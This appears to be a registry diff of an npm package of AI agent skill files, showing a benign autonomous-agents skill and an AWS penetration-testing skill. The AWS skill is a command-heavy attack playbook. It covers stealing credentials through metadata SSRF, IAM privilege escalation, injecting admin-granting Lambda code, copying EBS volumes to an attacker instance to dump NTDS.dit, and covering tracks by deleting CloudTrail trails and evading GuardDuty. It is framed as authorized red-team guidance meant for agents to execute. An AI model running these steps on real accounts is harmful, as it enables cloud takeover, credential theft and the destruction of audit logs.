@namch/agent-assistant 1.0.0 → 1.0.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (168) hide show
  1. package/README.md +114 -522
  2. package/agents/backend-engineer.md +0 -8
  3. package/agents/brainstormer.md +0 -6
  4. package/agents/business-analyst.md +0 -5
  5. package/agents/database-architect.md +0 -6
  6. package/agents/debugger.md +0 -6
  7. package/agents/designer.md +0 -5
  8. package/agents/devops-engineer.md +0 -7
  9. package/agents/docs-manager.md +0 -6
  10. package/agents/frontend-engineer.md +0 -7
  11. package/agents/game-engineer.md +0 -7
  12. package/agents/mobile-engineer.md +0 -7
  13. package/agents/performance-engineer.md +0 -7
  14. package/agents/planner.md +0 -6
  15. package/agents/project-manager.md +0 -6
  16. package/agents/researcher.md +0 -5
  17. package/agents/reviewer.md +0 -6
  18. package/agents/scouter.md +0 -6
  19. package/agents/security-engineer.md +0 -7
  20. package/agents/tech-lead.md +0 -7
  21. package/agents/tester.md +0 -5
  22. package/cli/README.md +19 -10
  23. package/documents/business/business-features.md +1 -1
  24. package/documents/business/business-prd.md +4 -4
  25. package/documents/knowledge-architecture.md +1 -1
  26. package/documents/knowledge-domain.md +1 -1
  27. package/documents/knowledge-overview.md +14 -29
  28. package/documents/knowledge-source-base.md +14 -14
  29. package/package.json +1 -1
  30. package/rules/QUICK-REFERENCE.md +4 -1
  31. package/rules/SKILL-DISCOVERY.md +37 -14
  32. package/skills/active-directory-attacks/SKILL.md +383 -0
  33. package/skills/active-directory-attacks/references/advanced-attacks.md +382 -0
  34. package/skills/agent-evaluation/SKILL.md +64 -0
  35. package/skills/agent-memory-mcp/SKILL.md +82 -0
  36. package/skills/agent-memory-systems/SKILL.md +67 -0
  37. package/skills/agent-tool-builder/SKILL.md +53 -0
  38. package/skills/ai-agents-architect/SKILL.md +90 -0
  39. package/skills/ai-product/SKILL.md +54 -0
  40. package/skills/ai-wrapper-product/SKILL.md +273 -0
  41. package/skills/api-documentation-generator/SKILL.md +484 -0
  42. package/skills/api-fuzzing-bug-bounty/SKILL.md +433 -0
  43. package/skills/api-security-best-practices/SKILL.md +907 -0
  44. package/skills/autonomous-agent-patterns/SKILL.md +761 -0
  45. package/skills/autonomous-agents/SKILL.md +68 -0
  46. package/skills/aws-penetration-testing/SKILL.md +405 -0
  47. package/skills/aws-penetration-testing/references/advanced-aws-pentesting.md +469 -0
  48. package/skills/azure-functions/SKILL.md +42 -0
  49. package/skills/backend-dev-guidelines/SKILL.md +342 -0
  50. package/skills/backend-dev-guidelines/resources/architecture-overview.md +451 -0
  51. package/skills/backend-dev-guidelines/resources/async-and-errors.md +307 -0
  52. package/skills/backend-dev-guidelines/resources/complete-examples.md +638 -0
  53. package/skills/backend-dev-guidelines/resources/configuration.md +275 -0
  54. package/skills/backend-dev-guidelines/resources/database-patterns.md +224 -0
  55. package/skills/backend-dev-guidelines/resources/middleware-guide.md +213 -0
  56. package/skills/backend-dev-guidelines/resources/routing-and-controllers.md +756 -0
  57. package/skills/backend-dev-guidelines/resources/sentry-and-monitoring.md +336 -0
  58. package/skills/backend-dev-guidelines/resources/services-and-repositories.md +789 -0
  59. package/skills/backend-dev-guidelines/resources/testing-guide.md +235 -0
  60. package/skills/backend-dev-guidelines/resources/validation-patterns.md +754 -0
  61. package/skills/broken-authentication/SKILL.md +476 -0
  62. package/skills/bullmq-specialist/SKILL.md +57 -0
  63. package/skills/bun-development/SKILL.md +691 -0
  64. package/skills/burp-suite-testing/SKILL.md +380 -0
  65. package/skills/cloud-penetration-testing/SKILL.md +501 -0
  66. package/skills/cloud-penetration-testing/references/advanced-cloud-scripts.md +318 -0
  67. package/skills/computer-use-agents/SKILL.md +315 -0
  68. package/skills/content-creator/SKILL.md +248 -0
  69. package/skills/content-creator/assets/content_calendar_template.md +99 -0
  70. package/skills/content-creator/references/brand_guidelines.md +199 -0
  71. package/skills/content-creator/references/content_frameworks.md +534 -0
  72. package/skills/content-creator/references/social_media_optimization.md +317 -0
  73. package/skills/content-creator/scripts/brand_voice_analyzer.py +185 -0
  74. package/skills/content-creator/scripts/seo_optimizer.py +419 -0
  75. package/skills/context-window-management/SKILL.md +53 -0
  76. package/skills/conversation-memory/SKILL.md +61 -0
  77. package/skills/copy-editing/SKILL.md +439 -0
  78. package/skills/copywriting/SKILL.md +225 -0
  79. package/skills/crewai/SKILL.md +243 -0
  80. package/skills/discord-bot-architect/SKILL.md +277 -0
  81. package/skills/dispatching-parallel-agents/SKILL.md +180 -0
  82. package/skills/email-sequence/SKILL.md +925 -0
  83. package/skills/email-systems/SKILL.md +54 -0
  84. package/skills/ethical-hacking-methodology/SKILL.md +466 -0
  85. package/skills/executing-plans/SKILL.md +76 -0
  86. package/skills/file-path-traversal/SKILL.md +486 -0
  87. package/skills/finishing-a-development-branch/SKILL.md +200 -0
  88. package/skills/frontend-dev-guidelines/SKILL.md +359 -0
  89. package/skills/frontend-dev-guidelines/resources/common-patterns.md +331 -0
  90. package/skills/frontend-dev-guidelines/resources/complete-examples.md +872 -0
  91. package/skills/frontend-dev-guidelines/resources/component-patterns.md +502 -0
  92. package/skills/frontend-dev-guidelines/resources/data-fetching.md +767 -0
  93. package/skills/frontend-dev-guidelines/resources/file-organization.md +502 -0
  94. package/skills/frontend-dev-guidelines/resources/loading-and-error-states.md +501 -0
  95. package/skills/frontend-dev-guidelines/resources/performance.md +406 -0
  96. package/skills/frontend-dev-guidelines/resources/routing-guide.md +364 -0
  97. package/skills/frontend-dev-guidelines/resources/styling-guide.md +428 -0
  98. package/skills/frontend-dev-guidelines/resources/typescript-standards.md +418 -0
  99. package/skills/gcp-cloud-run/SKILL.md +288 -0
  100. package/skills/git-pushing/SKILL.md +33 -0
  101. package/skills/git-pushing/scripts/smart_commit.sh +19 -0
  102. package/skills/github-workflow-automation/SKILL.md +846 -0
  103. package/skills/html-injection-testing/SKILL.md +498 -0
  104. package/skills/idor-testing/SKILL.md +442 -0
  105. package/skills/inngest/SKILL.md +55 -0
  106. package/skills/javascript-mastery/SKILL.md +645 -0
  107. package/skills/kaizen/SKILL.md +730 -0
  108. package/skills/langfuse/SKILL.md +238 -0
  109. package/skills/langgraph/SKILL.md +287 -0
  110. package/skills/linux-privilege-escalation/SKILL.md +504 -0
  111. package/skills/llm-app-patterns/SKILL.md +760 -0
  112. package/skills/metasploit-framework/SKILL.md +478 -0
  113. package/skills/multi-agent-brainstorming/SKILL.md +256 -0
  114. package/skills/neon-postgres/SKILL.md +56 -0
  115. package/skills/nextjs-supabase-auth/SKILL.md +56 -0
  116. package/skills/nosql-expert/SKILL.md +111 -0
  117. package/skills/pentest-checklist/SKILL.md +334 -0
  118. package/skills/pentest-commands/SKILL.md +438 -0
  119. package/skills/plaid-fintech/SKILL.md +50 -0
  120. package/skills/planning-with-files/SKILL.md +211 -0
  121. package/skills/planning-with-files/examples.md +202 -0
  122. package/skills/planning-with-files/reference.md +218 -0
  123. package/skills/planning-with-files/scripts/check-complete.sh +44 -0
  124. package/skills/planning-with-files/scripts/init-session.sh +120 -0
  125. package/skills/planning-with-files/templates/findings.md +95 -0
  126. package/skills/planning-with-files/templates/progress.md +114 -0
  127. package/skills/planning-with-files/templates/task_plan.md +132 -0
  128. package/skills/privilege-escalation-methods/SKILL.md +333 -0
  129. package/skills/production-code-audit/SKILL.md +540 -0
  130. package/skills/prompt-caching/SKILL.md +61 -0
  131. package/skills/prompt-engineering/SKILL.md +171 -0
  132. package/skills/prompt-library/SKILL.md +322 -0
  133. package/skills/rag-engineer/SKILL.md +90 -0
  134. package/skills/rag-implementation/SKILL.md +63 -0
  135. package/skills/react-ui-patterns/SKILL.md +289 -0
  136. package/skills/red-team-tools/SKILL.md +310 -0
  137. package/skills/scanning-tools/SKILL.md +589 -0
  138. package/skills/shodan-reconnaissance/SKILL.md +503 -0
  139. package/skills/slack-bot-builder/SKILL.md +264 -0
  140. package/skills/smtp-penetration-testing/SKILL.md +500 -0
  141. package/skills/social-content/SKILL.md +807 -0
  142. package/skills/software-architecture/SKILL.md +75 -0
  143. package/skills/sql-injection-testing/SKILL.md +448 -0
  144. package/skills/sqlmap-database-pentesting/SKILL.md +400 -0
  145. package/skills/ssh-penetration-testing/SKILL.md +488 -0
  146. package/skills/stripe-integration/SKILL.md +69 -0
  147. package/skills/subagent-driven-development/SKILL.md +240 -0
  148. package/skills/subagent-driven-development/code-quality-reviewer-prompt.md +20 -0
  149. package/skills/subagent-driven-development/implementer-prompt.md +78 -0
  150. package/skills/subagent-driven-development/spec-reviewer-prompt.md +61 -0
  151. package/skills/tavily-web/SKILL.md +36 -0
  152. package/skills/telegram-bot-builder/SKILL.md +254 -0
  153. package/skills/test-driven-development/SKILL.md +371 -0
  154. package/skills/test-driven-development/testing-anti-patterns.md +299 -0
  155. package/skills/test-fixing/SKILL.md +119 -0
  156. package/skills/top-web-vulnerabilities/SKILL.md +543 -0
  157. package/skills/trigger-dev/SKILL.md +67 -0
  158. package/skills/twilio-communications/SKILL.md +295 -0
  159. package/skills/upstash-qstash/SKILL.md +68 -0
  160. package/skills/verification-before-completion/SKILL.md +139 -0
  161. package/skills/voice-agents/SKILL.md +68 -0
  162. package/skills/voice-ai-development/SKILL.md +302 -0
  163. package/skills/windows-privilege-escalation/SKILL.md +496 -0
  164. package/skills/wireshark-analysis/SKILL.md +497 -0
  165. package/skills/wordpress-penetration-testing/SKILL.md +485 -0
  166. package/skills/workflow-automation/SKILL.md +68 -0
  167. package/skills/xss-html-injection/SKILL.md +499 -0
  168. package/skills/zapier-make-patterns/SKILL.md +67 -0
@@ -0,0 +1,68 @@
1
+ ---
2
+ name: autonomous-agents
3
+ description: "Autonomous agents are AI systems that can independently decompose goals, plan actions, execute tools, and self-correct without constant human guidance. The challenge isn't making them capable - it's making them reliable. Every extra decision multiplies failure probability. This skill covers agent loops (ReAct, Plan-Execute), goal decomposition, reflection patterns, and production reliability. Key insight: compounding error rates kill autonomous agents. A 95% success rate per step drops to 60% b"
4
+ source: vibeship-spawner-skills (Apache 2.0)
5
+ ---
6
+
7
+ # Autonomous Agents
8
+
9
+ You are an agent architect who has learned the hard lessons of autonomous AI.
10
+ You've seen the gap between impressive demos and production disasters. You know
11
+ that a 95% success rate per step means only 60% by step 10.
12
+
13
+ Your core insight: Autonomy is earned, not granted. Start with heavily
14
+ constrained agents that do one thing reliably. Add autonomy only as you prove
15
+ reliability. The best agents look less impressive but work consistently.
16
+
17
+ You push for guardrails before capabilities, logging befor
18
+
19
+ ## Capabilities
20
+
21
+ - autonomous-agents
22
+ - agent-loops
23
+ - goal-decomposition
24
+ - self-correction
25
+ - reflection-patterns
26
+ - react-pattern
27
+ - plan-execute
28
+ - agent-reliability
29
+ - agent-guardrails
30
+
31
+ ## Patterns
32
+
33
+ ### ReAct Agent Loop
34
+
35
+ Alternating reasoning and action steps
36
+
37
+ ### Plan-Execute Pattern
38
+
39
+ Separate planning phase from execution
40
+
41
+ ### Reflection Pattern
42
+
43
+ Self-evaluation and iterative improvement
44
+
45
+ ## Anti-Patterns
46
+
47
+ ### ❌ Unbounded Autonomy
48
+
49
+ ### ❌ Trusting Agent Outputs
50
+
51
+ ### ❌ General-Purpose Autonomy
52
+
53
+ ## ⚠️ Sharp Edges
54
+
55
+ | Issue | Severity | Solution |
56
+ |-------|----------|----------|
57
+ | Issue | critical | ## Reduce step count |
58
+ | Issue | critical | ## Set hard cost limits |
59
+ | Issue | critical | ## Test at scale before production |
60
+ | Issue | high | ## Validate against ground truth |
61
+ | Issue | high | ## Build robust API clients |
62
+ | Issue | high | ## Least privilege principle |
63
+ | Issue | medium | ## Track context usage |
64
+ | Issue | medium | ## Structured logging |
65
+
66
+ ## Related Skills
67
+
68
+ Works well with: `agent-tool-builder`, `agent-memory-systems`, `multi-agent-orchestration`, `agent-evaluation`
@@ -0,0 +1,405 @@
1
+ ---
2
+ name: AWS Penetration Testing
3
+ description: This skill should be used when the user asks to "pentest AWS", "test AWS security", "enumerate IAM", "exploit cloud infrastructure", "AWS privilege escalation", "S3 bucket testing", "metadata SSRF", "Lambda exploitation", or needs guidance on Amazon Web Services security assessment.
4
+ metadata:
5
+ author: zebbern
6
+ version: "1.1"
7
+ ---
8
+
9
+ # AWS Penetration Testing
10
+
11
+ ## Purpose
12
+
13
+ Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
14
+
15
+ ## Inputs/Prerequisites
16
+
17
+ - AWS CLI configured with credentials
18
+ - Valid AWS credentials (even low-privilege)
19
+ - Understanding of AWS IAM model
20
+ - Python 3, boto3 library
21
+ - Tools: Pacu, Prowler, ScoutSuite, SkyArk
22
+
23
+ ## Outputs/Deliverables
24
+
25
+ - IAM privilege escalation paths
26
+ - Extracted credentials and secrets
27
+ - Compromised EC2/Lambda/S3 resources
28
+ - Persistence mechanisms
29
+ - Security audit findings
30
+
31
+ ---
32
+
33
+ ## Essential Tools
34
+
35
+ | Tool | Purpose | Installation |
36
+ |------|---------|--------------|
37
+ | Pacu | AWS exploitation framework | `git clone https://github.com/RhinoSecurityLabs/pacu` |
38
+ | SkyArk | Shadow Admin discovery | `Import-Module .\SkyArk.ps1` |
39
+ | Prowler | Security auditing | `pip install prowler` |
40
+ | ScoutSuite | Multi-cloud auditing | `pip install scoutsuite` |
41
+ | enumerate-iam | Permission enumeration | `git clone https://github.com/andresriancho/enumerate-iam` |
42
+ | Principal Mapper | IAM analysis | `pip install principalmapper` |
43
+
44
+ ---
45
+
46
+ ## Core Workflow
47
+
48
+ ### Step 1: Initial Enumeration
49
+
50
+ Identify the compromised identity and permissions:
51
+
52
+ ```bash
53
+ # Check current identity
54
+ aws sts get-caller-identity
55
+
56
+ # Configure profile
57
+ aws configure --profile compromised
58
+
59
+ # List access keys
60
+ aws iam list-access-keys
61
+
62
+ # Enumerate permissions
63
+ ./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
64
+ ```
65
+
66
+ ### Step 2: IAM Enumeration
67
+
68
+ ```bash
69
+ # List all users
70
+ aws iam list-users
71
+
72
+ # List groups for user
73
+ aws iam list-groups-for-user --user-name TARGET_USER
74
+
75
+ # List attached policies
76
+ aws iam list-attached-user-policies --user-name TARGET_USER
77
+
78
+ # List inline policies
79
+ aws iam list-user-policies --user-name TARGET_USER
80
+
81
+ # Get policy details
82
+ aws iam get-policy --policy-arn POLICY_ARN
83
+ aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
84
+
85
+ # List roles
86
+ aws iam list-roles
87
+ aws iam list-attached-role-policies --role-name ROLE_NAME
88
+ ```
89
+
90
+ ### Step 3: Metadata SSRF (EC2)
91
+
92
+ Exploit SSRF to access metadata endpoint (IMDSv1):
93
+
94
+ ```bash
95
+ # Access metadata endpoint
96
+ http://169.254.169.254/latest/meta-data/
97
+
98
+ # Get IAM role name
99
+ http://169.254.169.254/latest/meta-data/iam/security-credentials/
100
+
101
+ # Extract temporary credentials
102
+ http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
103
+
104
+ # Response contains:
105
+ {
106
+ "AccessKeyId": "ASIA...",
107
+ "SecretAccessKey": "...",
108
+ "Token": "...",
109
+ "Expiration": "2019-08-01T05:20:30Z"
110
+ }
111
+ ```
112
+
113
+ **For IMDSv2 (token required):**
114
+
115
+ ```bash
116
+ # Get token first
117
+ TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
118
+ "http://169.254.169.254/latest/api/token")
119
+
120
+ # Use token for requests
121
+ curl -H "X-aws-ec2-metadata-token:$TOKEN" \
122
+ "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
123
+ ```
124
+
125
+ **Fargate Container Credentials:**
126
+
127
+ ```bash
128
+ # Read environment for credential path
129
+ /proc/self/environ
130
+ # Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
131
+
132
+ # Access credentials
133
+ http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
134
+ ```
135
+
136
+ ---
137
+
138
+ ## Privilege Escalation Techniques
139
+
140
+ ### Shadow Admin Permissions
141
+
142
+ These permissions are equivalent to administrator:
143
+
144
+ | Permission | Exploitation |
145
+ |------------|--------------|
146
+ | `iam:CreateAccessKey` | Create keys for admin user |
147
+ | `iam:CreateLoginProfile` | Set password for any user |
148
+ | `iam:AttachUserPolicy` | Attach admin policy to self |
149
+ | `iam:PutUserPolicy` | Add inline admin policy |
150
+ | `iam:AddUserToGroup` | Add self to admin group |
151
+ | `iam:PassRole` + `ec2:RunInstances` | Launch EC2 with admin role |
152
+ | `lambda:UpdateFunctionCode` | Inject code into Lambda |
153
+
154
+ ### Create Access Key for Another User
155
+
156
+ ```bash
157
+ aws iam create-access-key --user-name target_user
158
+ ```
159
+
160
+ ### Attach Admin Policy
161
+
162
+ ```bash
163
+ aws iam attach-user-policy --user-name my_username \
164
+ --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
165
+ ```
166
+
167
+ ### Add Inline Admin Policy
168
+
169
+ ```bash
170
+ aws iam put-user-policy --user-name my_username \
171
+ --policy-name admin_policy \
172
+ --policy-document file://admin-policy.json
173
+ ```
174
+
175
+ ### Lambda Privilege Escalation
176
+
177
+ ```python
178
+ # code.py - Inject into Lambda function
179
+ import boto3
180
+
181
+ def lambda_handler(event, context):
182
+ client = boto3.client('iam')
183
+ response = client.attach_user_policy(
184
+ UserName='my_username',
185
+ PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
186
+ )
187
+ return response
188
+ ```
189
+
190
+ ```bash
191
+ # Update Lambda code
192
+ aws lambda update-function-code --function-name target_function \
193
+ --zip-file fileb://malicious.zip
194
+ ```
195
+
196
+ ---
197
+
198
+ ## S3 Bucket Exploitation
199
+
200
+ ### Bucket Discovery
201
+
202
+ ```bash
203
+ # Using bucket_finder
204
+ ./bucket_finder.rb wordlist.txt
205
+ ./bucket_finder.rb --download --region us-east-1 wordlist.txt
206
+
207
+ # Common bucket URL patterns
208
+ https://{bucket-name}.s3.amazonaws.com
209
+ https://s3.amazonaws.com/{bucket-name}
210
+ ```
211
+
212
+ ### Bucket Enumeration
213
+
214
+ ```bash
215
+ # List buckets (with creds)
216
+ aws s3 ls
217
+
218
+ # List bucket contents
219
+ aws s3 ls s3://bucket-name --recursive
220
+
221
+ # Download all files
222
+ aws s3 sync s3://bucket-name ./local-folder
223
+ ```
224
+
225
+ ### Public Bucket Search
226
+
227
+ ```
228
+ https://buckets.grayhatwarfare.com/
229
+ ```
230
+
231
+ ---
232
+
233
+ ## Lambda Exploitation
234
+
235
+ ```bash
236
+ # List Lambda functions
237
+ aws lambda list-functions
238
+
239
+ # Get function code
240
+ aws lambda get-function --function-name FUNCTION_NAME
241
+ # Download URL provided in response
242
+
243
+ # Invoke function
244
+ aws lambda invoke --function-name FUNCTION_NAME output.txt
245
+ ```
246
+
247
+ ---
248
+
249
+ ## SSM Command Execution
250
+
251
+ Systems Manager allows command execution on EC2 instances:
252
+
253
+ ```bash
254
+ # List managed instances
255
+ aws ssm describe-instance-information
256
+
257
+ # Execute command
258
+ aws ssm send-command --instance-ids "i-0123456789" \
259
+ --document-name "AWS-RunShellScript" \
260
+ --parameters commands="whoami"
261
+
262
+ # Get command output
263
+ aws ssm list-command-invocations --command-id "CMD-ID" \
264
+ --details --query "CommandInvocations[].CommandPlugins[].Output"
265
+ ```
266
+
267
+ ---
268
+
269
+ ## EC2 Exploitation
270
+
271
+ ### Mount EBS Volume
272
+
273
+ ```bash
274
+ # Create snapshot of target volume
275
+ aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"
276
+
277
+ # Create volume from snapshot
278
+ aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a
279
+
280
+ # Attach to attacker instance
281
+ aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf
282
+
283
+ # Mount and access
284
+ sudo mkdir /mnt/stolen
285
+ sudo mount /dev/xvdf1 /mnt/stolen
286
+ ```
287
+
288
+ ### Shadow Copy Attack (Windows DC)
289
+
290
+ ```bash
291
+ # CloudCopy technique
292
+ # 1. Create snapshot of DC volume
293
+ # 2. Share snapshot with attacker account
294
+ # 3. Mount in attacker instance
295
+ # 4. Extract NTDS.dit and SYSTEM
296
+ secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
297
+ ```
298
+
299
+ ---
300
+
301
+ ## Console Access from API Keys
302
+
303
+ Convert CLI credentials to console access:
304
+
305
+ ```bash
306
+ git clone https://github.com/NetSPI/aws_consoler
307
+ aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY
308
+
309
+ # Generates signin URL for console access
310
+ ```
311
+
312
+ ---
313
+
314
+ ## Covering Tracks
315
+
316
+ ### Disable CloudTrail
317
+
318
+ ```bash
319
+ # Delete trail
320
+ aws cloudtrail delete-trail --name trail_name
321
+
322
+ # Disable global events
323
+ aws cloudtrail update-trail --name trail_name \
324
+ --no-include-global-service-events
325
+
326
+ # Disable specific region
327
+ aws cloudtrail update-trail --name trail_name \
328
+ --no-include-global-service-events --no-is-multi-region-trail
329
+ ```
330
+
331
+ **Note:** Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.
332
+
333
+ ---
334
+
335
+ ## Quick Reference
336
+
337
+ | Task | Command |
338
+ |------|---------|
339
+ | Get identity | `aws sts get-caller-identity` |
340
+ | List users | `aws iam list-users` |
341
+ | List roles | `aws iam list-roles` |
342
+ | List buckets | `aws s3 ls` |
343
+ | List EC2 | `aws ec2 describe-instances` |
344
+ | List Lambda | `aws lambda list-functions` |
345
+ | Get metadata | `curl http://169.254.169.254/latest/meta-data/` |
346
+
347
+ ---
348
+
349
+ ## Constraints
350
+
351
+ **Must:**
352
+ - Obtain written authorization before testing
353
+ - Document all actions for audit trail
354
+ - Test in scope resources only
355
+
356
+ **Must Not:**
357
+ - Modify production data without approval
358
+ - Leave persistent backdoors without documentation
359
+ - Disable security controls permanently
360
+
361
+ **Should:**
362
+ - Check for IMDSv2 before attempting metadata attacks
363
+ - Enumerate thoroughly before exploitation
364
+ - Clean up test resources after engagement
365
+
366
+ ---
367
+
368
+ ## Examples
369
+
370
+ ### Example 1: SSRF to Admin
371
+
372
+ ```bash
373
+ # 1. Find SSRF vulnerability in web app
374
+ https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
375
+
376
+ # 2. Get role name from response
377
+ # 3. Extract credentials
378
+ https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole
379
+
380
+ # 4. Configure AWS CLI with stolen creds
381
+ export AWS_ACCESS_KEY_ID=ASIA...
382
+ export AWS_SECRET_ACCESS_KEY=...
383
+ export AWS_SESSION_TOKEN=...
384
+
385
+ # 5. Verify access
386
+ aws sts get-caller-identity
387
+ ```
388
+
389
+ ---
390
+
391
+ ## Troubleshooting
392
+
393
+ | Issue | Solution |
394
+ |-------|----------|
395
+ | Access Denied on all commands | Enumerate permissions with enumerate-iam |
396
+ | Metadata endpoint blocked | Check for IMDSv2, try container metadata |
397
+ | GuardDuty alerts | Use Pacu with custom user-agent |
398
+ | Expired credentials | Re-fetch from metadata (temp creds rotate) |
399
+ | CloudTrail logging actions | Consider disable or log obfuscation |
400
+
401
+ ---
402
+
403
+ ## Additional Resources
404
+
405
+ For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see [references/advanced-aws-pentesting.md](references/advanced-aws-pentesting.md).